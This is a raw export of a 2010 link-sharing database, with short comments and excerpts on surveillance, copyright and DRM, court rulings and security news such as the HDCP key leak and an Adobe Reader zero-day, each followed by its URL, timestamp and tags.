+</p>http://www.centredaily.com/2010/09/14/2206710/documents-show-homeland-security.htmlpage_shots/2010/09/15/pahomelandsecuritygavenamesofanti-drillacti.pngpahomelandsecuritygavenamesofanti-drillacti131012010-09-15 14:13:367activism dhs polizeistaat überwachung zivilgesellschaftPiratenpartei veröffentlicht Indect Dokumentehttp://www.golem.de/1009/77884.htmlpage_shots/2010/09/14/piratenparteiveroffentlichtindectdokumente.pngpiratenparteiveroffentlichtindectdokumente51012010-09-14 12:56:317europa indect überwachungJean-Luc Godard donates €1K for accused MP3 downloader's defense: "There is no such thing as intellectual property"Apparently the great French-Swiss film director Jean-Luc Godard (above) donated a thousand euros toward the legal defense costs of James Climent (inset), a 37-year-old French citizen accused of downloading 13,788 MP3s. +" From what I can make out, Climent was fined 20,000 euros by SACEM and SDRM following lengthy court proceedings. +I am against Hadopi [the French internet-copyright law, or its attendant agency], of course. There is no such thing as intellectual property. I'm against the inheritance [of works], for example. An artist's children could benefit from the copyright of their parents' works, say, until they reach the age of majority... But afterward, it's not clear to me why Ravel's children should get any income from Bolero... "<p>Apparently the great French-Swiss film director Jean-Luc Godard (above) donated a thousand euros toward the legal defense costs of James Climent (inset), a 37-year-old French citizen accused of downloading 13,788 MP3s. + " From what I can make out, Climent was fined 20,000 euros by SACEM and SDRM following lengthy court proceedings. + I am against Hadopi [the French internet-copyright law, or its attendant agency], of course. There is no such thing as intellectual property. I'm against the inheritance [of works], for example. An artist's children could benefit from the copyright of their parents' works, say, until they reach the age of majority... But afterward, it's not clear to me why Ravel's children should get any income from Bolero... " +</p>http://www.ecrans.fr/Jean-Luc-Godard-soutient-un-pirate,10810.htmlpage_shots/2010/09/14/jean-lucgodarddonates1kforaccusedmp3downlo.pngjean-lucgodarddonates1kforaccusedmp3downlo131012010-09-14 10:08:247bittorrent contentmafia copyfight piracyHDCP master-key leaks, possible to make unrestricted Blu-Ray recordersEngadget reports that the master key that controls HDCP, the anti-copying system used to restrict the outputs of Blu-Ray boxes, set-top boxes, and many game systems, have been compromised and published. With these keys, knowledgeable users can make their own "source" and "sink" keys for devices that permit copying at full resolution -- which means that you should be able to create a hard-drive-based recorder that you can plug into your Blu-Ray player and record shows in real-time. This player would be immune to "revocation" (part of the HDCP specification that allows a cartel of Hollywood studios to remotely disable devices so they won't interoperate with compromised systems -- essentially, the ability to reach into your living room and shut down your equipment). + +Apparently there is a cryptographic argument that says that these master keys could be derived from any fifty HDCP devices, but my money is on a plain old leak. Cryptographic keys are tiny pieces of information, and this sort of key would be known to a large number of people: a small, easily conveyed secret known to a lot of people is pretty much doomed. <p>Engadget reports that the master key that controls HDCP, the anti-copying system used to restrict the outputs of Blu-Ray boxes, set-top boxes, and many game systems, have been compromised and published. With these keys, knowledgeable users can make their own "source" and "sink" keys for devices that permit copying at full resolution -- which means that you should be able to create a hard-drive-based recorder that you can plug into your Blu-Ray player and record shows in real-time. This player would be immune to "revocation" (part of the HDCP specification that allows a cartel of Hollywood studios to remotely disable devices so they won't interoperate with compromised systems -- essentially, the ability to reach into your living room and shut down your equipment). +</p> +<p>Apparently there is a cryptographic argument that says that these master keys could be derived from any fifty HDCP devices, but my money is on a plain old leak. Cryptographic keys are tiny pieces of information, and this sort of key would be known to a large number of people: a small, easily conveyed secret known to a lot of people is pretty much doomed. +</p>http://www.engadget.com/2010/09/14/hdcp-master-key-supposedly-released-unlocks-hdtv-copy-protect/page_shots/2010/09/14/hdcpmaster-keyleakspossibletomakeunrestrict.pnghdcpmaster-keyleakspossibletomakeunrestrict131012010-09-14 09:59:337contentmafia copyfight crypto drmGoogle search index splits with MapReduce • The RegisterGoogle is moving from MapReduce to GFS2 + BigTableDB<p>Google is moving from MapReduce to GFS2 + BigTableDB +</p>http://www.theregister.co.uk/2010/09/09/google_caffeine_explained/page_shots/2010/09/14/googlesearchindexsplitswithmapreducethere.pnggooglesearchindexsplitswithmapreducethere11012010-09-14 09:29:077googlegulli.com - news - view - Personalausweis: Schüler löschen Chip mit einfachsten MittelnEtwas kritisch diskutieren. Schüler zerkloppen ePerso mit Lötkolben. Mikrowelle wäre evtl. leichter gewesen...<p>Etwas kritisch diskutieren. Schüler zerkloppen ePerso mit Lötkolben. Mikrowelle wäre evtl. leichter gewesen... +</p>http://www.gulli.com/news/personalausweis-sch-ler-l-schen-chip-mit-einfachsten-mitteln-2010-09-13page_shots/2010/09/14/gullicom-news-view-personalausweisschuler.pnggullicom-news-view-personalausweisschuler11012010-09-14 09:22:167epersoAuf der Suche nach dem sicheren Datenhafen - heute.de NachrichtenDas Safe-Harbor-Abkommen regelt den Datenaustausch zwischen der EU und den USA. US-Unternehmen verpflichten sich darin zu einem strengen Datenschutz. Experten sagen, dass sich kaum ein Unternehmen an die Regeln hält. Eine Kontrolle gibt es nicht.<p>Das Safe-Harbor-Abkommen regelt den Datenaustausch zwischen der EU und den USA. US-Unternehmen verpflichten sich darin zu einem strengen Datenschutz. Experten sagen, dass sich kaum ein Unternehmen an die Regeln hält. Eine Kontrolle gibt es nicht. +</p>http://www.heute.de/ZDFheute/inhalt/8/0,3672,8109320,00.htmlpage_shots/2010/09/13/aufdersuchenachdemsicherendatenhafen-heute.pngaufdersuchenachdemsicherendatenhafen-heute11012010-09-13 17:36:387biz datenschutzAbove the Law - Russia Uses Microsoft to Suppress Dissent - NYTimes.comAnother reason to *not* use FOSS: Putin beschlagnahmt Computer von Typen, die er nicht mag. M$ hetzt deren Anwälte los. + +Instead, the group fell victim to one of the authorities’ newest tactics for quelling dissent: confiscating computers under the pretext of searching for pirated Microsoft software. + +Interviews and a review of law enforcement documents show that in recent cases, Microsoft lawyers made statements describing the company as a victim and arguing that criminal charges should be pursued. <p>Another reason to <em>not</em> use FOSS: Putin beschlagnahmt Computer von Typen, die er nicht mag. M$ hetzt deren Anwälte los. +</p> +<p>Instead, the group fell victim to one of the authorities’ newest tactics for quelling dissent: confiscating computers under the pretext of searching for pirated Microsoft software. +</p> +<p>Interviews and a review of law enforcement documents show that in recent cases, Microsoft lawyers made statements describing the company as a victim and arguing that criminal charges should be pursued. +</p>http://www.nytimes.com/2010/09/12/world/europe/12raids.htmlpage_shots/2010/09/12/abovethelaw-russiausesmicrosofttosuppress_.pngabovethelaw-russiausesmicrosofttosuppress11012010-09-12 23:13:467microsoft raid russiaNo, you don't own it: Court upholds EULAs, threatens digital resaleThe Ninth Circuit court ruled today that you do not have the right to sell used software if the license agreement forbids it. The case centered on legitimate copies of Autodesk sold second-hand on eBay, but the ruling spells trouble for any business (e.g. GameStop) that relies on America's increasingly cold-to-the-touch doctrine of first sale.<p>The Ninth Circuit court ruled today that you do not have the right to sell used software if the license agreement forbids it. The case centered on legitimate copies of Autodesk sold second-hand on eBay, but the ruling spells trouble for any business (e.g. GameStop) that relies on America's increasingly cold-to-the-touch doctrine of first sale. +</p>http://arstechnica.com/tech-policy/news/2010/09/the-end-of-used-major-ruling-upholds-tough-software-licenses.arspage_shots/2010/09/11/noyoudontownitcourtupholdseulasthreate.pngnoyoudontownitcourtupholdseulasthreate131012010-09-11 17:34:247digital, eula, imaginary property, rights, software, urteilrobots learn when a situation might call for some less-than-honest behaviorCome the robot revolution, we'll all probably be forced to play hide-and-seek a lot. Researchers at Georgia Tech have worked out algorithms that allow robots to learn when a situation might call for some less-than-honest behavior, and help our soon-to-be-overlords figure out how best to deceive us. So far, the robots have only used this new-found ability to lay false trails during games of hide-and-go-seek. But I think we all know what's coming. Eventually. <p>Come the robot revolution, we'll all probably be forced to play hide-and-seek a lot. Researchers at Georgia Tech have worked out algorithms that allow robots to learn when a situation might call for some less-than-honest behavior, and help our soon-to-be-overlords figure out how best to deceive us. So far, the robots have only used this new-found ability to lay false trails during games of hide-and-go-seek. But I think we all know what's coming. Eventually. +</p>http://www.edmontonsun.com/news/weird/2010/09/09/15294701.htmlpage_shots/2010/09/11/robotslearnwhenasituationmightcallforsome.pngrobotslearnwhenasituationmightcallforsome131012010-09-11 17:32:387robotDHS Cybersecurity Watchdogs Miss Hundreds of Vulnerabilities on Their Own Network | Threat Level | Wired.comPoor guys.<p>Poor guys. +</p>http://www.wired.com/threatlevel/2010/09/us-cert/page_shots/2010/09/10/dhscybersecuritywatchdogsmisshundredsofvulne.pngdhscybersecuritywatchdogsmisshundredsofvulne11012010-09-10 21:03:057us-certSwedish cops' attempt to build database of shoe-treads snarled in copyright lawHere's the latest weirdness: the Swedish cops are trying to assemble a database of what kinds of prints are made by which brands of shoes, using images harvested from the Web. But Swedish copyright law prohibits this. +The police claim that the law lets them ignore copyright in solving crimes, but an intellectual property professor quoted in the article notes that such an exemption only applies in the direct police investigation of a specific crime -- not for the sake of building up a general database. The professor suggests that this appears to be a clear violation of Swedish copyright laws.<p>Here's the latest weirdness: the Swedish cops are trying to assemble a database of what kinds of prints are made by which brands of shoes, using images harvested from the Web. But Swedish copyright law prohibits this. + The police claim that the law lets them ignore copyright in solving crimes, but an intellectual property professor quoted in the article notes that such an exemption only applies in the direct police investigation of a specific crime -- not for the sake of building up a general database. The professor suggests that this appears to be a clear violation of Swedish copyright laws. +</p>http://www.techdirt.com/articles/20100903/04490510892.shtmlpage_shots/2010/09/10/swedishcopsattempttobuilddatabaseofshoe-tr.pngswedishcopsattempttobuilddatabaseofshoe-tr131012010-09-10 12:57:327copyfight copyright database police security surveillance sweden theaterEuropean Parliament Asks EU ACTA Negotiators to Protect Citizens&#039; Fundamental Rights | Electronic Frontier FoundationIn a victory for democracy and transparency, the European Parliament adopted Written Declaration 12/2010 (WD 12) on the proposed Anti-Counterfeiting Trade Agreement earlier this week. WD 12 calls on EU negotiators to ensure that ACTA does not weaken citizens' fundamental rights of freedom of expression, privacy, and judicial due process, and will not require Internet intermediaries to act as copyright police at the behest of the entertainment industry. WD 12 also calls on EU negotiators to make the ACTA negotiation texts public, and to ensure that ACTA's proposed border measures do not interfere with access to affordable medicines.<p>In a victory for democracy and transparency, the European Parliament adopted Written Declaration 12/2010 (WD 12) on the proposed Anti-Counterfeiting Trade Agreement earlier this week. WD 12 calls on EU negotiators to ensure that ACTA does not weaken citizens' fundamental rights of freedom of expression, privacy, and judicial due process, and will not require Internet intermediaries to act as copyright police at the behest of the entertainment industry. WD 12 also calls on EU negotiators to make the ACTA negotiation texts public, and to ensure that ACTA's proposed border measures do not interfere with access to affordable medicines. +</p>http://www.eff.org/deeplinks/2010/09/european-parliament-asks-EU-ACTA-negotiators-to-protect-citizens'-rightspage_shots/2010/09/09/europeanparliamentaskseuactanegotiatorstopr.pngeuropeanparliamentaskseuactanegotiatorstopr11012010-09-09 23:33:597acta euIs Sarah Palin a Computer Criminal? | Electronic Frontier FoundationLet's assume that Palin created her own Facebook account, and then hired Mansour to manage it. So what, right? +The problem is that Facebook's terms of use prohibit several things that Palin and her ghostwriter may have done. Specifically, it forbids users from: +... +* accessing someone else's account +* sharing their passwords to let someone else access their accounts +* transferring their accounts to someone else (without Facebook's written permission) +* providing false personal information +* "facilitating" or "encouraging" someone else to violate the terms of use +... +But violating a website's terms of use is a big deal, according to Facebook. In fact, Facebook says it's a federal crime.<p>Let's assume that Palin created her own Facebook account, and then hired Mansour to manage it. So what, right? + The problem is that Facebook's terms of use prohibit several things that Palin and her ghostwriter may have done. Specifically, it forbids users from: + ... + * accessing someone else's account + <em> sharing their passwords to let someone else access their accounts +</em> transferring their accounts to someone else (without Facebook's written permission) + <em> providing false personal information +</em> "facilitating" or "encouraging" someone else to violate the terms of use + ... + But violating a website's terms of use is a big deal, according to Facebook. In fact, Facebook says it's a federal crime. +</p>http://www.eff.org/deeplinks/2010/09/sarah-palin-computer-criminalpage_shots/2010/09/09/issarahpalinacomputercriminalelectronicf.pngissarahpalinacomputercriminalelectronicf11012010-09-09 23:24:487facebook palinReport: Abu Ghraib photos Obama is censoring "show rape" and sexual torture of men, women, and childrenMajor General Antonio Taguba, the former army officer who conducted the Abu Ghraib inquiry, confirms that rape and sexual abuse are documented in the photographs that US president Barack Obama has ordered censored. From the Daily Telegraph: +"At least one picture shows an American soldier apparently raping a female prisoner while another is said to show a male translator raping a male detainee. Further photographs are said to depict sexual assaults on prisoners with objects including a truncheon, wire and a phosphorescent tube. Another apparently shows a female prisoner having her clothing forcibly removed to expose her breasts. " +One of those incidents reportedly involved a 15-year-old male victim. <p>Major General Antonio Taguba, the former army officer who conducted the Abu Ghraib inquiry, confirms that rape and sexual abuse are documented in the photographs that US president Barack Obama has ordered censored. From the Daily Telegraph: + "At least one picture shows an American soldier apparently raping a female prisoner while another is said to show a male translator raping a male detainee. Further photographs are said to depict sexual assaults on prisoners with objects including a truncheon, wire and a phosphorescent tube. Another apparently shows a female prisoner having her clothing forcibly removed to expose her breasts. " + One of those incidents reportedly involved a 15-year-old male victim. +</p>http://www.telegraph.co.uk/news/worldnews/northamerica/usa/5395830/Abu-Ghraib-abuse-photos-show-rape.htmlpage_shots/2010/09/09/reportabughraibphotosobamaiscensoringshow.pngreportabughraibphotosobamaiscensoringshow131012010-09-09 22:07:227abuse censorship hardware obama politics terrorSecret copyright treaty: USA caves on border laptop/phone/MP3 player searches for copyright infringementMost interesting is the U.S. decision to cave on border issues. The U.S. had sought a provision requiring that each party shall adopt and maintain appropriate measures that facilitate activities of custom authorities for better identifying and targeting for inspection at its border shipments that could contain pirated goods. The article then specified a range of activities including consultation, information exchange, and a mandatory audit power. Moreover, there was an additional article on information exchange between customs authorities. All of that has been dropped, leaving only a provision where a party may consult with stakeholders or share information. <p>Most interesting is the U.S. decision to cave on border issues. The U.S. had sought a provision requiring that each party shall adopt and maintain appropriate measures that facilitate activities of custom authorities for better identifying and targeting for inspection at its border shipments that could contain pirated goods. The article then specified a range of activities including consultation, information exchange, and a mandatory audit power. Moreover, there was an additional article on information exchange between customs authorities. All of that has been dropped, leaving only a provision where a party may consult with stakeholders or share information. +</p>http://www.michaelgeist.ca/content/view/5290/125/page_shots/2010/09/09/secretcopyrighttreatyusacavesonborderlapto.pngsecretcopyrighttreatyusacavesonborderlapto131012010-09-09 22:03:137aclu acta contentmafia copyfight eff tsaWhat parents worry about, what parents should worry aboutased on surveys Barnes collected, the top five worries of parents are, in order: + +1. Kidnapping +2. School snipers +3. Terrorists +4. Dangerous strangers +5. Drugs + +But how do children really get hurt or killed? +1. Car accidents +2. Homicide (usually committed by a person who knows the child, not a stranger) +3. Abuse +4. Suicide +5. Drowning <p>ased on surveys Barnes collected, the top five worries of parents are, in order: +</p> +<ol> + <li> + Kidnapping + </li> + + <li> + School snipers + </li> + + <li> + Terrorists + </li> + + <li> + Dangerous strangers + </li> + + <li> + Drugs + </li> +</ol> +<p>But how do children really get hurt or killed? + 1. Car accidents + 2. Homicide (usually committed by a person who knows the child, not a stranger) + 3. Abuse + 4. Suicide + 5. Drowning +</p>http://www.npr.org/blogs/health/2010/08/30/129531631/5-worries-parents-should-drop-and-5-they-should?sc=fb&cc=fppage_shots/2010/09/09/whatparentsworryaboutwhatparentsshouldworr.pngwhatparentsworryaboutwhatparentsshouldworr131012010-09-09 22:02:097angst security surveillance theaterYour password are stars - hehe:-) Update zum localhost-Exploit OR Social Eng vom Feinsten.<p>:-) Update zum localhost-Exploit OR Social Eng vom Feinsten. +</p>http://i.imgur.com/RsuPK.jpgpage_shots/2010/09/09/unknowntitle_.pngunknowntitle11012010-09-09 16:21:237facebook, social engineeringNo Medal of Honor for US MilitaryGamers, watch out if you are with the army. + +WASHINGTON (AP) -- Military bases across the U.S. have banned the sale of a new video game that lets a player pretend to be a Taliban fighter and "shoot" U.S. troops in Afghanistan. +"Medal of Honor" by Electronic Arts, a major game developer based in Redwood City, Calif., hits stores Oct. 12. Gamers are scoffing at the decision, saying that advanced technology has made it commonplace in the gaming world to let players switch sides and play the bad guy. +After public protests, including by British Defense Secretary Liam Fox, U.S. military officials decided not to stock the game in any of the nearly 300 base exchange shops. +The game also won't be sold at any of the 49 GameStop stores located on various military bases. Troops will be allowed to own copies, but they would have to buy them off-base<p>Gamers, watch out if you are with the army. +</p> +<p>WASHINGTON (AP) -- Military bases across the U.S. have banned the sale of a new video game that lets a player pretend to be a Taliban fighter and "shoot" U.S. troops in Afghanistan. + "Medal of Honor" by Electronic Arts, a major game developer based in Redwood City, Calif., hits stores Oct. 12. Gamers are scoffing at the decision, saying that advanced technology has made it commonplace in the gaming world to let players switch sides and play the bad guy. + After public protests, including by British Defense Secretary Liam Fox, U.S. military officials decided not to stock the game in any of the nearly 300 base exchange shops. + The game also won't be sold at any of the 49 GameStop stores located on various military bases. Troops will be allowed to own copies, but they would have to buy them off-base +</p>http://hosted.ap.org/dynamic/stories/U/US_MILITARY_VIDEO_GAMEpage_shots/2010/09/09/no-medal-of-honor.pngno-medal-of-honor11012010-09-09 16:16:157army games FOXNews.com - EXCLUSIVE: WikiLeaks Founder Julian Assange Fights Calls to Step DownTraurig, WL fängt an sich selbst zu zerlegen.<p>Traurig, WL fängt an sich selbst zu zerlegen. +</p>http://www.foxnews.com/scitech/2010/09/08/wikileaks-julian-assange-fights/page_shots/2010/09/09/foxnewscom-exclusivewikileaksfounderjulian.pngfoxnewscom-exclusivewikileaksfounderjulian11012010-09-09 16:12:417wikileaksAdobe Reader zero-day attack &ndash; now with stolen certificate - SecurelistDavor haben wir in der Sendung Screwed Socket Layer gewarnt. ROP muss man erklären. + +Today Adobe put out an advisory for a previously unknown zero-day in its PDF Reader/Acrobat software. This vulnerability is actively being exploited in the wild. + +The exploit is pretty basic. What’s interesting about it is that it makes use of Return Oriented Programming to bypass the ASLR and DEP mitigation technologies in Windows Vista and 7. + +More widespread usage of ROP for exploits is something I’ve been expecting for a while. Why? Because Windows 7 is gaining more and more traction in both the consumer and corporate space. + +While most malicious PDFs download their payload, this time the PDF has malicious content embedded. The PDF drops an executable into the %temp% directory and tries to execute it. + +The file it drops is digitally signed with a valid signature from a US-based Credit Union!<p>Davor haben wir in der Sendung Screwed Socket Layer gewarnt. ROP muss man erklären. +</p> +<p>Today Adobe put out an advisory for a previously unknown zero-day in its PDF Reader/Acrobat software. This vulnerability is actively being exploited in the wild. +</p> +<p>The exploit is pretty basic. What’s interesting about it is that it makes use of Return Oriented Programming to bypass the ASLR and DEP mitigation technologies in Windows Vista and 7. +</p> +<p>More widespread usage of ROP for exploits is something I’ve been expecting for a while. Why? Because Windows 7 is gaining more and more traction in both the consumer and corporate space. +</p> +<p>While most malicious PDFs download their payload, this time the PDF has malicious content embedded. The PDF drops an executable into the %temp% directory and tries to execute it. +</p> +<p>The file it drops is digitally signed with a valid signature from a US-based Credit Union! +</p>http://www.securelist.com/en/blog/2287/Adobe_Reader_zero_day_attack_now_with_stolen_certificatepage_shots/2010/09/09/adobereaderzero-dayattackndashnowwithstol.pngadobereaderzero-dayattackndashnowwithstol11012010-09-09 16:10:4570day adobe pdfMathias Döpfner über das Netz: "Freiheit von innen bedroht" - taz.deDie Pressefreiheit sei "von innen" bedroht, sagt Springer-Vorstandschef Döpfner. Nämlich durch die "Gratis-Kultur" im Internet. Der müsse man "sich widersetzen".<p>Die Pressefreiheit sei "von innen" bedroht, sagt Springer-Vorstandschef Döpfner. Nämlich durch die "Gratis-Kultur" im Internet. Der müsse man "sich widersetzen". +</p>http://www.taz.de/1/leben/medien/artikel/1/freiheit-von-innen-bedroht/page_shots/2010/09/09/mathiasdopfneruberdasnetzfreiheitvoninnen.pngmathiasdopfneruberdasnetzfreiheitvoninnen11012010-09-09 15:59:577press springer Web 2.0 Selbstmord Maschine : netzpolitik.orgDie Effizienz der Maschine ist atemberaubend: Die Zeitersparnis bewegt sich im Bereich mehrerer Stunden, und Facebook, Twitter, LinkedIn und Myspace werden abgedeckt. +Facebook hat schon eine Unterlassungsaufforderung geschrieben und mit rechtlichen Schritten gedroht, doch die Maschine selbstmordet unaufhaltsam weiter. Bis zum heutigen Tag hat sie 1,2 Mio Freunde entfolgt, eine halbe Million Tweets gelöscht, und über 4.000 digitale Identitäten um die Ecke gebracht.<p>Die Effizienz der Maschine ist atemberaubend: Die Zeitersparnis bewegt sich im Bereich mehrerer Stunden, und Facebook, Twitter, LinkedIn und Myspace werden abgedeckt. + Facebook hat schon eine Unterlassungsaufforderung geschrieben und mit rechtlichen Schritten gedroht, doch die Maschine selbstmordet unaufhaltsam weiter. Bis zum heutigen Tag hat sie 1,2 Mio Freunde entfolgt, eine halbe Million Tweets gelöscht, und über 4.000 digitale Identitäten um die Ecke gebracht. +</p>http://www.netzpolitik.org/2010/web-2-0-selbstmord-maschine/page_shots/2010/09/08/web20selbstmordmaschinenetzpolitikorg.pngweb20selbstmordmaschinenetzpolitikorg11012010-09-08 18:16:077suicide web2.0Piratenpartei veröffentlicht INDECT-Dokumente: EU forscht im Geheimen am Überwachungsstaat | Piratenpartei DeutschlandIn Zusammenarbeit mit der deutschen Piratenpartei wurde heute von der futurezone ein enthüllender Artikel über das EU-Projekt INDECT veröffentlicht. Er basiert auf internen Fortschritts- und Planungsdokumenten, die den Piraten zugespielt wurden. Diese werden der Öffentlichkeit bewusst vorenthalten: Aufgrund vielfältiger Kritik beschlossen die Projekt-Verantwortlichen kürzlich sogar eine neue Geheimhaltungsstufe. Welche Daten an die Öffentlichkeit gelangen, beschließt ab jetzt ein INDECT-"Ethikrat". + +Die Dokumente verraten, dass die EU eine Vielzahl von Technologien erforschen und einsetzen will, um ihre Bürger lückenlos überwachen zu können. + +Aufbau automatisierter Überwachungsstruktur + +Das Projekt sieht vor, den Einsatz von Überwachungskameras auszubauen und ihre Daten automatisiert auszuwerten. Für die Luftüberwachung sollen sogar Drohnen eingesetzt werden. Außerdem ist geplant, Datenspuren der Bürger im Internet – insbesondere in sozialen Netzwerken, Foren und Blogs – zu analysieren, speichern, vernetzen und nutzen, um potentielle Gefährder zu erkennen. + +Überwachungskameras nutzen präventiv die biometrischen Daten aus Pässen, um Personen zu identifizieren. Wie die veröffentlichten Dokumente verraten, sollen durch mangelhaft konzipierte Umfragen unter Polizisten stereotype Gefährder-Profile geschaffen werden: Wie sehen Taschendiebe, Hooligans oder Terroristen aus? Woran erkennt man Vandalismus, Überfälle oder Personen, die Hilfe benötigen? Das Projekt weiß eine Antwort darauf: Generell ist jeder verdächtig, der auf der Straße läuft, rennt oder zu schnell fährt. Wer im öffentlichen Nahverkehr auf dem Fußboden sitzt, zu lange mitfährt oder sein Gepäck vergisst, muss ebenfalls mit Maßnahmen der Sicherheitskräfte rechnen. Genauso verdächtig sind "herumlungern", sich mit zu vielen Personen treffen und fluchen. + +Anhand der gewonnenen Profile sollen die automatisierten Programme lernen, Gefährder selbständig zu erkennen. Angesichts der mangelhaften Ausgangsdaten werden somit falschen Anschuldigungen Tür und Tor geöffnet.<p>In Zusammenarbeit mit der deutschen Piratenpartei wurde heute von der futurezone ein enthüllender Artikel über das EU-Projekt INDECT veröffentlicht. Er basiert auf internen Fortschritts- und Planungsdokumenten, die den Piraten zugespielt wurden. Diese werden der Öffentlichkeit bewusst vorenthalten: Aufgrund vielfältiger Kritik beschlossen die Projekt-Verantwortlichen kürzlich sogar eine neue Geheimhaltungsstufe. Welche Daten an die Öffentlichkeit gelangen, beschließt ab jetzt ein INDECT-"Ethikrat". +</p> +<p>Die Dokumente verraten, dass die EU eine Vielzahl von Technologien erforschen und einsetzen will, um ihre Bürger lückenlos überwachen zu können. +</p> +<p>Aufbau automatisierter Überwachungsstruktur +</p> +<p>Das Projekt sieht vor, den Einsatz von Überwachungskameras auszubauen und ihre Daten automatisiert auszuwerten. Für die Luftüberwachung sollen sogar Drohnen eingesetzt werden. Außerdem ist geplant, Datenspuren der Bürger im Internet – insbesondere in sozialen Netzwerken, Foren und Blogs – zu analysieren, speichern, vernetzen und nutzen, um potentielle Gefährder zu erkennen. +</p> +<p>Überwachungskameras nutzen präventiv die biometrischen Daten aus Pässen, um Personen zu identifizieren. Wie die veröffentlichten Dokumente verraten, sollen durch mangelhaft konzipierte Umfragen unter Polizisten stereotype Gefährder-Profile geschaffen werden: Wie sehen Taschendiebe, Hooligans oder Terroristen aus? Woran erkennt man Vandalismus, Überfälle oder Personen, die Hilfe benötigen? Das Projekt weiß eine Antwort darauf: Generell ist jeder verdächtig, der auf der Straße läuft, rennt oder zu schnell fährt. Wer im öffentlichen Nahverkehr auf dem Fußboden sitzt, zu lange mitfährt oder sein Gepäck vergisst, muss ebenfalls mit Maßnahmen der Sicherheitskräfte rechnen. Genauso verdächtig sind "herumlungern", sich mit zu vielen Personen treffen und fluchen. +</p> +<p>Anhand der gewonnenen Profile sollen die automatisierten Programme lernen, Gefährder selbständig zu erkennen. Angesichts der mangelhaften Ausgangsdaten werden somit falschen Anschuldigungen Tür und Tor geöffnet. +</p>http://www.piratenpartei.de/100908-Piratenpartei-veroeffentlicht-INDECT-Dokumentepage_shots/2010/09/09/piratenparteiveroffentlichtindect-dokumenteeu.pngpiratenparteiveroffentlichtindect-dokumenteeu11012010-09-08 15:31:057bürgerrechte indect privatssphäre surveillance Grüne starten Hackerangriff auf FDP : netzpolitik.orgFDP ist sauer, weil jemand deren Abstimmung genutzt hat.<p>FDP ist sauer, weil jemand deren Abstimmung genutzt hat. +</p>http://www.netzpolitik.org/2010/grune-starten-hackerangriff-auf-fdp/page_shots/2010/09/08/grunestartenhackerangriffauffdpnetzpoliti.pnggrunestartenhackerangriffauffdpnetzpoliti11012010-09-08 15:26:497fdpVirginia Court of Appeals: law enforcement should have the right to track criminal suspects with GPS, even without a warrant.The Virginia Court of Appeals ruled today that law enforcement should have the right to track criminal suspects with GPS, even without a warrant: "In a case that prompted warnings of Orwellian snooping by the government, the court unanimously ruled that Fairfax County Police did nothing wrong when they planted a GPS device on the bumper of a registered sex offender's work van without obtaining a warrant."<p>The Virginia Court of Appeals ruled today that law enforcement should have the right to track criminal suspects with GPS, even without a warrant: "In a case that prompted warnings of Orwellian snooping by the government, the court unanimously ruled that Fairfax County Police did nothing wrong when they planted a GPS device on the bumper of a registered sex offender's work van without obtaining a warrant." +</p>http://www.wtvr.com/news/dp-va--gpstracking-appea0907sep07,0,7510292.storypage_shots/2010/09/08/no_page_shot.pngvirginiacourtofappealslawenforcementshould131012010-09-08 14:08:097bürgerrechte, eff, gps, law enforcement, polizeistaat, tracking, urteilACLU + NYCLU are challenging the [US] government's claimed authority to search, detain, and copy electronic devices at the country's international borders without any suspicion of wrongdoing.The ACLU today announced that together with the New York Civil Liberties Union (NYCLU), and the National Association of Criminal Defense Lawyers, it has filed a lawsuit "challenging the [US] government's claimed authority to search, detain, and copy electronic devices -- including laptops, cell phones, cameras, etc. -- at the country's international borders without any suspicion of wrongdoing." <p>The ACLU today announced that together with the New York Civil Liberties Union (NYCLU), and the National Association of Criminal Defense Lawyers, it has filed a lawsuit "challenging the [US] government's claimed authority to search, detain, and copy electronic devices -- including laptops, cell phones, cameras, etc. -- at the country's international borders without any suspicion of wrongdoing." +</p>http://www.aclu.org/blog/free-speech-technology-and-liberty/aclu-challenges-laptop-searches-and-seizures-borderpage_shots/2010/09/08/aclunycluarechallengingtheusgovernments.pngaclunycluarechallengingtheusgovernments131012010-09-08 14:05:577aclu bürgerrechte eff tsaBundesweites Zentralregister ab 2013: GEZ soll vollen Zugriff auf Daten erhalten | NGZ-OnlineWer da dachte mit der Pauschalabgabe für Rundfunk wird die GEZ aufgelöst... + +Die Länder wollen die Bürger verpflichten, gegenüber der GEZ umfangreiche Auskünfte zu geben. Bei Weigerung drohen Zwangsvollstreckung und Bußgelder. + +Dem Entwurf zufolge soll die GEZ, der heute kein Bürger auch nur die Tür öffnen muss, künftig vollen Zugriff auf die Daten der örtlichen Einwohnermeldeämter haben "und bei öffentlichen und nichtöffentlichen Stellen ohne Kenntnis des Betroffenen" weitere Bürger-Daten erheben dürfen. Die ARD-Rundfunkanstalten sollen diese Daten untereinander austauschen dürfen. + +Um die Gebührenpflicht feststellen zu können, soll jeder Inhaber einer Wohnung verpflichtet werden, der GEZ umfangreiche persönliche Angaben auch über Mitbewohner zu machen. Bei Weigerung soll die GEZ Zwangsvollstreckungen gegen Bürger durchsetzen oder Grundstückseigentümer und Hausverwaltungen in Haftung nehmen dürfen. Im Zuge der Umstellung soll auch die weitgehende Gebührenbefreiung für rund 580 000 Behinderte künftig entfallen. Entlastet werden in dem Entwurf große Unternehmen und die Inhaber von Zweitwohnsitzen und Ferienwohnungen.<p>Wer da dachte mit der Pauschalabgabe für Rundfunk wird die GEZ aufgelöst... +</p> +<p>Die Länder wollen die Bürger verpflichten, gegenüber der GEZ umfangreiche Auskünfte zu geben. Bei Weigerung drohen Zwangsvollstreckung und Bußgelder. +</p> +<p>Dem Entwurf zufolge soll die GEZ, der heute kein Bürger auch nur die Tür öffnen muss, künftig vollen Zugriff auf die Daten der örtlichen Einwohnermeldeämter haben "und bei öffentlichen und nichtöffentlichen Stellen ohne Kenntnis des Betroffenen" weitere Bürger-Daten erheben dürfen. Die ARD-Rundfunkanstalten sollen diese Daten untereinander austauschen dürfen. +</p> +<p>Um die Gebührenpflicht feststellen zu können, soll jeder Inhaber einer Wohnung verpflichtet werden, der GEZ umfangreiche persönliche Angaben auch über Mitbewohner zu machen. Bei Weigerung soll die GEZ Zwangsvollstreckungen gegen Bürger durchsetzen oder Grundstückseigentümer und Hausverwaltungen in Haftung nehmen dürfen. Im Zuge der Umstellung soll auch die weitgehende Gebührenbefreiung für rund 580 000 Behinderte künftig entfallen. Entlastet werden in dem Entwurf große Unternehmen und die Inhaber von Zweitwohnsitzen und Ferienwohnungen. +</p>http://www.ngz-online.de/politik/deutschland/GEZ-soll-vollen-Zugriff-auf-Daten-erhalten_aid_903357.htmlpage_shots/2010/09/07/bundesweiteszentralregisterab2013gezsollvol.pngbundesweiteszentralregisterab2013gezsollvol11012010-09-07 21:59:177gezCourts May Require Search Warrants for Cell Phone 